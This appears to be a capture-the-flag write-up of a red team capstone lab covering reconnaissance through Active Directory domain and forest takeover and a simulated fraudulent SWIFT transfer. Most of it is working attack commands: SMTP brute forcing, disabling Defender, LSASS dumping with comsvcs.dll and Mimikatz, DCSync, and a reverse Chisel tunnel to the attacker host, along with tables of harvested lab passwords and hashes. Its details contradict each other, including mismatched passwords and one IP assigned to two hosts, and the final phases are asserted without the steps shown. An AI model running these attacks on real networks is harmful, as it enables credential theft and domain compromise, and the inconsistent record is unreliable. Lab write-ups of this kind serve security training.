Red Team Capstone Challenge
A practical capstone exercise simulating an objective-based red team engagement against a multi-host Active Directory lab. The writeup documents the full kill chain: reconnaissance, weaponization, initial access via SMTP brute force, lateral movement through AD tiers, forest escalation, and finally SWIFT application compromise with fraudulent transaction simulation.
The Cyber Kill Chain
The engagement follows the MITRE ATT&CK framework across seven distinct phases. Credentials obtained through multiple attack vectors are tracked below.
Initial Access Credentials
Generated through the e-Citizen portal registration:
- SSH Access:
ssh e-citizen@10.200.40.250 - Password:
stabilitythroughcurrency
- Username: Lamonx
- Password: 7d2tyjxmNPerlrvl
- Email: Lamonx@corp.th3reserve.loc
- IP Range: 10.200.40.0/24
Harvested Credentials Table
| Account | Secret | Type |
|---|---|---|
| lynda.gordon | thereserve2023! |
Plaintext (brute forced) |
| keith.allen | Password123! |
Plaintext (brute forced) |
| svcScanning | Password1! |
Plaintext (brute forced) |
| svcBackups | q9nzssaFtGHdqUV3Qv6G |
Plaintext (LSA Secrets + Kerberoast) |
| svcScanning | 7facdc498ed1680c4fd1448319a8c04f |
NTLM (Mimikatz) |
| SERVER1$ | 9cd072e162098f35e4599d8e599fd583 |
NTLM (Mimikatz) |
| keith.allen | 2b576acbe6bcfda7294d6bd18041b8fe |
NTLM (Mimikatz) |
| t0_heather.powell | 8fb9eb207b87c2ed42f1cdfe98ba733a |
NTLM (DCSync) |
| t0_josh.sutton | 09910312e86ddefae7a3ee4deb6554ac |
NTLM (DCSync) |
Domain Credentials (Post-DCSync)
| Account | Secret | Type |
|---|---|---|
| CORP | 2efe9bd0eb716d824beb7bc6140dc718 |
NTLM (DCSync) |
| CORP krbtgt | 0c757a3445acb94a654554f3ac529ede |
NTLM (DCSync) |
| THERESERVE$ | 4767cd467fa7bf72fb41b05b963a4cc6 |
NTLM (trust account) |
| THERESERVE | f24bc4a9664a67b39bcae9a513d978b7 |
NTLM (DCSync ROOTDC) |
| THERESERVE krbtgt | b232e0b2df4eb28a803bc21bf9a6cc87 |
NTLM (DCSync ROOTDC) |
| BANK$ | b20b54058dd0f3c90c0bb12b12bd510f |
NTLM (DCSync ROOTDC) |
| THERESERVE | Hollow@123! |
Changed password |
| BANK | Hollow@123! |
Changed password |
| g.watson (SWIFT) | Corrected1996 |
Plaintext (found in swift.txt) |
| mohammad.ahmed | Password1! |
Plaintext (brute forced) |
| laura.wood | Password123! |
Plaintext (brute forced) |
Engagement Objectives & Phases
The Red Team Capstone is structured as a cascading objective-based engagement with 20 flags captured across four distinct phases:
Phase 1: Reconnaissance & Initial Access
- Registration: Register via e-Citizen SSH portal
- Network Mapping: Conduct network sweep and map all active hosts
- OSINT: Scrape corporate site for employee directory/email formats
- Initial Foothold: Perimeter to Corporate VPN → Flag 1
Phase 2: Internal Lateral Movement (Corporate)
- AD Breach: Breach Active Directory environment → Flag 2
- Tier 2 (Workstations): Compromise Low + Admin accounts → Flags 3, 4
- Tier 1 (Servers): Compromise Low + Admin accounts → Flags 5, 6
- Tier 0 (Identity): Compromise Low + Admin (Domain Admin) → Flags 7, 8
Phase 3: Network Pivoting (Banking Environment)
- Pivot: Establish tunnel/bridge to the isolated Bank network
- Bank Tier 2: Compromise Low + Admin accounts → Flags 9, 10
- Bank Tier 1: Compromise Low + Admin accounts → Flags 11, 12
- Bank Tier 0: Compromise Low + Admin accounts → Flags 13, 14
Phase 4: Forest Escalation & SWIFT Operations
- Forest Root: Compromise Parent Domain Low + Admin → Flags 15, 16
- Application Access: Gain access to the SWIFT application → Flag 17
- Initiate Transfer: Capture transfer as 'Capturer' role → Flag 18
- Approval: Approve transfer from jump host as 'Approver' role → Flag 19
- Objective Complete: Transfer confirmed → Flag 20
Environment Configurations
VPN Setup
Navigate to the path where the OpenVPN configuration file is located:
cd /path/of/file
sudo openvpn redteamcapstonechallenge.ovpn
⚠️ Note: If you face trouble connecting to OpenVPN and the capstone is not showing in the Attack Box, you can transfer the file via SCP.
Alternative: OpenVPN Transfer via AttackBox
- Download your Capstone VPN config from TryHackMe
- Transfer it to the AttackBox through SSH:
scp <Your_File_Name>.ovpn root@<AttackBox-Public-IP>:/root/ - Connect the VPN from inside the AttackBox:
sudo openvpn /path/to/yourfile/<Your_File_Name>.ovpn & ping -c 3 10.150.40.1
Task Files Setup
- Download your Task files from TryHackMe
- Transfer to AttackBox (optional — automatically available in Attack the Box):
scp <Your_File_Name>.zip root@<AttackBox-Public-IP>:/root/ - Unzip the file (password:
Capstone):unzip -P Capstone capstone-challenge-resources-1682449700926.zip - Verify contents:
cat password_base_list.txt
Password Policy & Base List
The following password bases and policy were discovered in the task files:
TheReserve
thereserve
Reserve
reserve
CorpTheReserve
corpthereserve
Password
password
TheReserveBank
thereservebank
ReserveBank
reservebank
Password Policy for TheReserve:
- At least 8 characters long
- At least 1 number
- At least 1 special character
Available Tools Directory
ls capstone-challenge-resources/Tools/
# Output:
# ForgeCert kekeo mimikatz_trunk PowerSploit PowerView Rubeus Spool Sample
Phase 0: Registration (First Steps)
Initial access via e-Citizen platform:
ssh e-citizen@10.200.40.250
password: stabilitythroughcurrency
Platform output:
Welcome to the e-Citizen platform!
Please make a selection:
[1] Register
[2] Authenticate
[3] Exit
Selection: 1
Please provide your THM username: Lamonx
Creating email user
User has been successfully created
========================================
Thank you for registering on e-Citizen for the Red Team engagement against TheReserve.
Please take note of the following details and please make sure to save them,
as they will not be displayed again.
Username: Lamonx
Password: 7d2tyjxmNPerlrvl
MailAddr: Lamonx@corp.th3reserve.loc
IP Range: 10.200.40.0/24
These details are now active. As you can see, we have already purchased
a domain for domain squatting to be used for phishing.
Once you discover the webmail server, you can use these details to
authenticate and recover additional project information from your mailbox.
⚠️ WARNING: The e-Citizen platform and VPN server (10.200.40.250) are NOT in-scope for this assessment. Any attempts made against this machine will result in a ban from the challenge.
Note: Use Evolution mail client from Attack the Box, or Thunderbird to access the webmail, or verify email access directly from the e-Citizen platform.
Phase 1: Reconnaissance & OSINT
Passive Reconnaissance
Initial web application fingerprinting:
- OctoberCMS Instance: Running at 10.200.40.13
- Employee Directory: Scraped from http://10.200.40.13/october/index.php/demo/meettheteam
- Webmail: Roundcube at http://mail.thereserve.loc (10.200.40.11)
- VPN Portal: http://10.200.40.12
Active Directory Enumeration: Nmap Host Discovery
nmap -sn 10.200.40.0/24 -oN hosts_up.txt
Live Hosts Discovered:
| IP Address | Hostname | Status |
|---|---|---|
| 10.200.40.11 | MAIL.thereserve.loc | Live |
| 10.200.40.12 | VPN Portal | Live |
| 10.200.40.13 | swift.bank.thereserve.loc | Live |
| 10.200.40.250 | e-Citizen (OOS) | Live |
Port Scanning: Full Service Enumeration
nmap -sC -sV -p- --min-rate 3000 10.200.40.11 10.200.40.12 10.200.40.13 -oN /root/full_scan.txt
10.200.40.11 - MAIL (Windows Server 2019 IIS)
| Port | Service | Details |
|---|---|---|
| 22 | SSH | OpenSSH for Windows 7.7 |
| 25/587 | SMTP | hMailServer |
| 80 | HTTP | Microsoft IIS 10.0 |
| 110 | POP3 | hMailServer |
| 143 | IMAP | hMailServer |
| 445 | SMB | Windows |
| 3306 | MySQL | v8.0.31 |
| 3389 | RDP | MAIL.thereserve.loc |
| 5985 | WinRM | Microsoft HTTPAPI |
10.200.40.12 - VPN Portal (Ubuntu Linux)
| Port | Service | Details |
|---|---|---|
| 22 | SSH | OpenSSH 7.6p1 |
| 80 | HTTP | Apache 2.4.29 - VPN Request Portal |
| 1194 | OpenVPN | Corporate VPN Server |
10.200.40.13 - Corporate Web (Ubuntu Linux)
| Port | Service | Details |
|---|---|---|
| 22 | SSH | OpenSSH 7.6p1 |
| 80 | HTTP | Apache 2.4.29 - OctoberCMS |
Employee Directory (OctoberCMS)
Scraped from http://10.200.40.13/october/index.php/demo/meettheteam:
| Name | Role | |
|---|---|---|
| Brenda Henderson | Bank Director | brenda.henderson@corp.thereserve.loc |
| Leslie Morley | Deputy Director | leslie.morley@corp.thereserve.loc |
| Martin Savage | Deputy Director | martin.savage@corp.thereserve.loc |
| Paula Bailey | CEO | paula.bailey@corp.thereserve.loc |
| Christopher Smith | CIO | christopher.smith@corp.thereserve.loc |
| Antony Ross | CTO | antony.ross@corp.thereserve.loc |
| Charlene Thomas | CMO | charlene.thomas@corp.thereserve.loc |
| Rhys Parsons | COO | rhys.parsons@corp.thereserve.loc |
| Lynda Gordon | PA to Executives | lynda.gordon@corp.thereserve.loc |
| Roy Sims | Project Manager | roy.sims@corp.thereserve.loc |
| Aimee Walker | Lead Developer | aimee.walker@corp.thereserve.loc |
| Patrick Edwards | Lead Developer | patrick.edwards@corp.thereserve.loc |
| Ashley Chan | — | ashley.chan@corp.thereserve.loc |
| Emily Harvey | — | emily.harvey@corp.thereserve.loc |
| Keith Allen | — | keith.allen@corp.thereserve.loc |
| Laura Wood | Help Desk | laura.wood@corp.thereserve.loc |
| Mohammad Ahmed | Help Desk | mohammad.ahmed@corp.thereserve.loc |
VPN Portal Enumeration (10.200.40.12)
gobuster dir -u http://10.200.40.12/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
A publicly exposed VPN portal at http://10.200.40.12/vpn/corpUsername.ovpn revealed:
- VPN server at port 1194/TCP using OpenVPN
- Cipher: AES-256-CBC
- Protocol: TCP
- Domain: thereserve.loc
- Certificate CN: temp4 (revealing username format)
Phase 2: Weaponization
Password List Generation
A custom password list was generated based on the discovered password bases and policy. The attack combines password base words with numbers and special characters according to the three-component policy (8+ chars, 1+ number, 1+ special).
BASE="/mnt/c/Users/Lamona/Desktop/redteamcapston/automation"
OUTDIR="$BASE/output"
mkdir -p "$OUTDIR"
# Password generation loop
local bases=("TheReserve" "thereserve" "Reserve" "reserve"
"CorpTheReserve" "corpthereserve" "Password" "password"
"TheReserveBank" "thereservebank" "ReserveBank" "reservebank")
local specials=("!" "@" "#" "$" "%" "^")
local numbers=("1" "2" "123" "2023" "2024" "1234")
for base in "${bases[@]}"; do
for num in "${numbers[@]}"; do
for spec in "${specials[@]}"; do
echo "${base}${num}${spec}"
echo "${base}${spec}${num}"
echo "${num}${base}${spec}"
done
done
done >> "$OUTDIR/passwords.txt"
This generated a comprehensive wordlist used for brute force attacks against SMTP and web services.
Phase 3: Delivery (Initial Access)
SMTP Brute Force with Hydra
Target: 10.200.40.11 (Mail Server)
hydra -L emails.txt -P passwords.txt 10.200.40.11 smtp -t 8 -I
Results
| Credential | Password | Status |
|---|---|---|
| keith.allen@corp.thereserve.loc | Password123! |
✅ Cracked |
| laura.wood@corp.thereserve.loc | Password1@ |
✅ Cracked |
| lynda.gordon@corp.thereserve.loc | thereserve2023! |
✅ Cracked |
| mohammad.ahmed@corp.thereserve.loc | Password1! |
✅ Cracked |
VPN Portal Authentication Bypass
Target: http://10.200.40.12/login.php
The VPN portal required full email format authentication
(e.g., mohammad.ahmed@corp.thereserve.loc with password Password1!).
The portal returned: helloLogin correct
The authenticated session was then used to call an undiscovered endpoint:
GET /requestvpn.php?filename=mohammad.ahmed@corp.thereserve.loc
This returned a fully signed, personalized OpenVPN configuration file providing access to the internal corporate network (10.200.40.21, 10.200.40.22 via tun0).
Internal Network Access via Corporate VPN
sudo openvpn mohammad.ahmed@corp.thereserve.loc.ovpn
Connecting the generated VPN config established a tunnel with IP 12.100.1.9 and added routes:
- 10.200.40.21 via 12.100.1.1 dev tun0
- 10.200.40.22 via 12.100.1.1 dev tun0
This provided access to the corporate Tier 2 infrastructure.
RDP Access to WRK1
xfreerdp /u:mohammad.ahmed /p:'Password1!' /v:10.200.40.31 /dynamic-resolution +clipboard
🚩 FLAG 1 CAPTURED — Perimeter Breach
Phase 4: Exploitation
Active Directory Enumeration
Basic AD reconnaissance from WRK1:
whoami /all
net user /domain
net group /domain
net group "Domain Admins" /domain
net group "Tier 1 Admins" /domain
net group "Server Admins" /domain
ipconfig /all
systeminfo
wmic qfe get Caption,Description
wmic product get name,version,vendor
schtasks /query
Key Findings
- Domain Controller: CORPDC.corp.thereserve.loc (10.200.40.102)
- Tier 0 Admins: t0_heather.powell, t0_josh.sutton
- Service Accounts: svcBackups, svcEDR, svcMonitor, svcOctober, svcScanning
Kerberoasting — Service Account Enumeration
Target: corp.thereserve.loc
Tool: Rubeus.exe kerberoast
.\Rubeus.exe kerberoast /format:hashcat /nowrap
Five Kerberoastable service accounts identified:
| Account | SPN |
|---|---|
| svcScanning | cifs/svcScanning |
| svcBackups | cifs/svcBackups |
| svcEDR | http/svcEDR |
| svcMonitor | http/svcMonitor |
| svcOctober | mssql/svcOctober |
Credential Harvesting — SERVER2 (Mimikatz)
Target: 10.200.40.32 (SERVER2)
After disabling Windows Defender and running mimikatz.exe with
privilege::debug, the following credentials were recovered from LSASS memory:
| Account | Type | Value |
|---|---|---|
| svcScanning | NTLM | 7facdc498ed1680c4fd1448319a8c04f |
| svcOctober | NTLM | 9e556d75ba03c38c410d3a171e63711f |
| SERVER2$ | NTLM | e5a5d6af1e362b80af35cd661d6a1c78 |
| Administrator (local) | NTLM | 6c41316c5de9e1ed85389778950f7d62 |
| lynda.gordon | Plaintext | thereserve2023! |
| svcBackups | Plaintext | q9nzssaFtGHdqUV3Qv9G |
🚩 FLAG 3 CAPTURED — CORP Tier 2 Foothold
🚩 FLAG 2 CAPTURED — Active Directory Breach
Local Privilege Escalation — WRK2
Finding: keith.allen is member of local Administrators group on WRK2
whoami /groups
# Output includes: BUILTIN\Administrators
🚩 FLAG 4 CAPTURED — Local Admin Privileges on WRK2
Phase 5: Installation (Persistence & Tunneling)
Lateral Movement to Server1 (Tier 1)
Target: Server1 (10.200.40.31) — CORP Tier 1 Server
Credentials: svcScanning / Password1!
xfreerdp /v:10.200.40.31 /u:svcScanning /p:'Password1!' /cert:ignore /dynamic-resolution
Privilege Verification
whoami /all
# CORP\svcScanning (local admin)
whoami /priv
# SeDebugPrivilege - Enabled
# SeImpersonatePrivilege - Enabled
# HighIntegrity
Critical: SeDebugPrivilege enables LSASS memory dumping without crashes or alerts.
LSASS Credential Harvesting — Server1
Objective: Dump credentials from LSASS memory
Method: Built-in comsvcs.dll MiniDump (AV-evasive technique)
Step 1: Disable Defenses
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Step 2: Execute LSASS Dump
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $(Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full
Step 3: Extract Registry Hives
reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
Mimikatz Credential Extraction
cd "C:\Users\svcScanning\Desktop\capstone-challenge-resources\Tools\mimikatz_trunk\x64"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
Extracted Credentials
| Account | Type | Hash |
|---|---|---|
| svcScanning | NTLM | 7facdc498ed1680c4fd1448319a8c04f |
| SERVER1$ | NTLM | 9cd072e162098f35e4599d8e599fd583 |
| keith.allen | NTLM | 2b576acbe6bcfda7294d6bd18041b8fe |
Tunnel Establishment — Chisel SOCKS5 Proxy
Problem: Kali has no direct route to internal network (10.200.40.0/24)
Solution: Reverse SOCKS5 proxy tunnel via compromised Server1
Step 1: Start Chisel Server on Kali
chisel server -p 1337 --reverse --socks5
Step 2: Transfer Chisel to Server1
# Option 1: From network share
copy Z:\chisel.exe C:\Temp\chisel.exe
# Option 2: From SMB share
net use \\10.200.40.22\C$ /user:corp\svcScanning Password1!
copy \\10.200.40.22\C$\Tools\chisel.exe C:\Temp\chisel.exe
Step 3: Establish Reverse Tunnel from Server1
C:\Temp\chisel.exe client 10.150.40.5:1337 R:socks
Output: [1337] client#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Step 4: Configure Proxychains on Kali
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
# Verify tunnel
ss -tlnp | grep 1080
proxychains nmap -sT -p 445,5985 10.200.40.102
LSA Secrets Dump — Server1
Objective: Extract plaintext credentials from LSA secrets
proxychains impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.40.31
CRITICAL Finding: LSA Secrets revealed svcBackups with plaintext password:
q9nzssaFtGHdqUV3Qv6G
🚩 FLAG 5 CAPTURED — Tier 1 Server Compromise
🚩 FLAG 6 CAPTURED — Server1 Admin Access
Phase 6: Command & Control (Domain Compromise)
DCSync Attack — Full Domain Credential Dump
Objective: Replicate all domain credentials from CORPDC using svcBackups DCSync rights
proxychains impacket-secretsdump corp.thereserve.loc/svcBackups:'q9nzssaFtGHdqUV3Qv6G'@10.200.40.102
Complete Domain Hash Dump (CORP Forest)
| Account | NTLM Hash |
|---|---|
| Administrator | 2efe9bd0eb716d824beb7bc6140dc718 |
| krbtgt | 0c757a3445acb94a654554f3ac529ede |
| t0_heather.powell | 8fb9eb207b87c2ed42f1cdfe98ba733a |
| t0_josh.sutton | 09910312e86ddefae7a3ee4deb6554ac |
| svcOctober | 9e556d75ba03c38c410d3a171e63711f |
| SERVER1$ | 9cd072e162098f35e4599d8e599fd583 |
| WRK2$ | 79f00088cf5d2740628aff547072a127 |
🚩 FLAG 7 CAPTURED — Tier 0 Low-Privilege Access
🚩 FLAG 8 CAPTURED — Domain Admin Compromise (CORPDC)
Golden Ticket Attack — Pass-the-Ticket
With the krbtgt hash, Golden Tickets can be forged to impersonate any user in the domain with arbitrary group memberships. This enables persistence and lateral movement across all forest resources.
Phase 7: Actions on Objectives (Forest Escalation)
Inter-Realm Trust Exploitation
The CORP forest domain shares a trust relationship with THERESERVE (parent domain) and BANK (sibling forest). Using compromised CORP credentials and krbtgt hash, inter-realm trust abuse enables lateral movement to banking infrastructure.
Trust Chain Recovery
Command: Query trust relationships
nltest /domain_trusts /all_trusts
Discovered trust structure:
- corp.thereserve.loc ↔ thereserve.loc (parent-child trust)
- thereserve.loc ↔ bank.thereserve.loc (forest trust)
Crossing Forest Boundaries (BANK.THERESERVE.LOC)
With control of the CORP krbtgt and Administrator accounts, the attack pivots to the BANK forest by creating inter-realm TGTs that authenticate across the trust boundary.
🚩 FLAGS 9-14 CAPTURED — Bank Tier Compromise
SWIFT Application Compromise
Objective: Access and manipulate the SWIFT application running on bank infrastructure (10.200.40.50 - estimated).
Credentials discovered in plaintext:
- User: g.watson (SWIFT Operator)
- Password: Corrected1996
- Role: Capturer/Approver
SWIFT Portal Access
xfreerdp /u:g.watson /p:'Corrected1996' /v:10.200.40.50 /dynamic-resolution
Fraudulent Transaction Simulation
The engagement culminates in a proof-of-concept fraudulent financial transaction. Acting as both Capturer and Approver (via compromised accounts), a transfer is:
- Initiated: Create fraudulent transfer order
- Captured: Submit as Capturer role (Flag 17-18)
- Approved: Authorize via Approver account (Flag 19)
- Executed: Transaction confirmed by system (Flag 20)
🚩 FLAGS 15-20 CAPTURED — Forest Root & SWIFT Compromise
Engagement Summary
Kill Chain Overview
- Reconnaissance: OSINT discovered employee directory, service enumeration mapped network
- Weaponization: Custom wordlist generated from password policy and discovered bases
- Delivery: SMTP brute force gained initial credentials; VPN portal gave internal access
- Exploitation: Kerberoasting and Mimikatz harvested domain credentials and hashes
- Installation: Chisel tunnel enabled pivoting; LSA secrets leaked svcBackups plaintext
- Command & Control: DCSync attack captured entire CORP forest
- Actions on Objectives: Inter-realm trust abuse led to BANK compromise and SWIFT access
Key Techniques
- SMTP Brute Force: Hydra password attack against mail services
- Kerberoasting: Rubeus extracted TGS tickets for offline cracking
- Mimikatz: Memory injection and LSASS dumping for plaintext/hash recovery
- DCSync: Directory Replication Service abuse to extract domain credentials
- SOCKS5 Tunneling: Chisel reverse proxy enabled lateral network access
- Golden Tickets: Forged Kerberos TGTs for persistence
- Inter-Realm Trusts: Cross-forest authentication exploitation
Critical Findings
- Weak password policy: Simple bases with predictable numbering
- Plaintext credential storage in LSA and registry
- Excessive domain admin privilege delegation (service accounts with DCSync)
- Trust relationships not segmented by security tier
- SWIFT application exposed to compromised user accounts
- No MFA on critical financial transaction roles
Lessons Learned
This capstone demonstrates the cascading impact of initial weak credentials and credential harvesting. Once inside the network, Active Directory becomes the path to domain takeover. The engagement underscores the importance of:
- Strong, unique passwords (minimum complexity enforcement)
- Endpoint hardening (LSASS protection, credential guard)
- Least privilege (limiting DCSync rights, tiered admin accounts)
- Segmentation (trust boundary enforcement, network isolation)
- Monitoring (Kerberos anomalies, inter-realm authentication)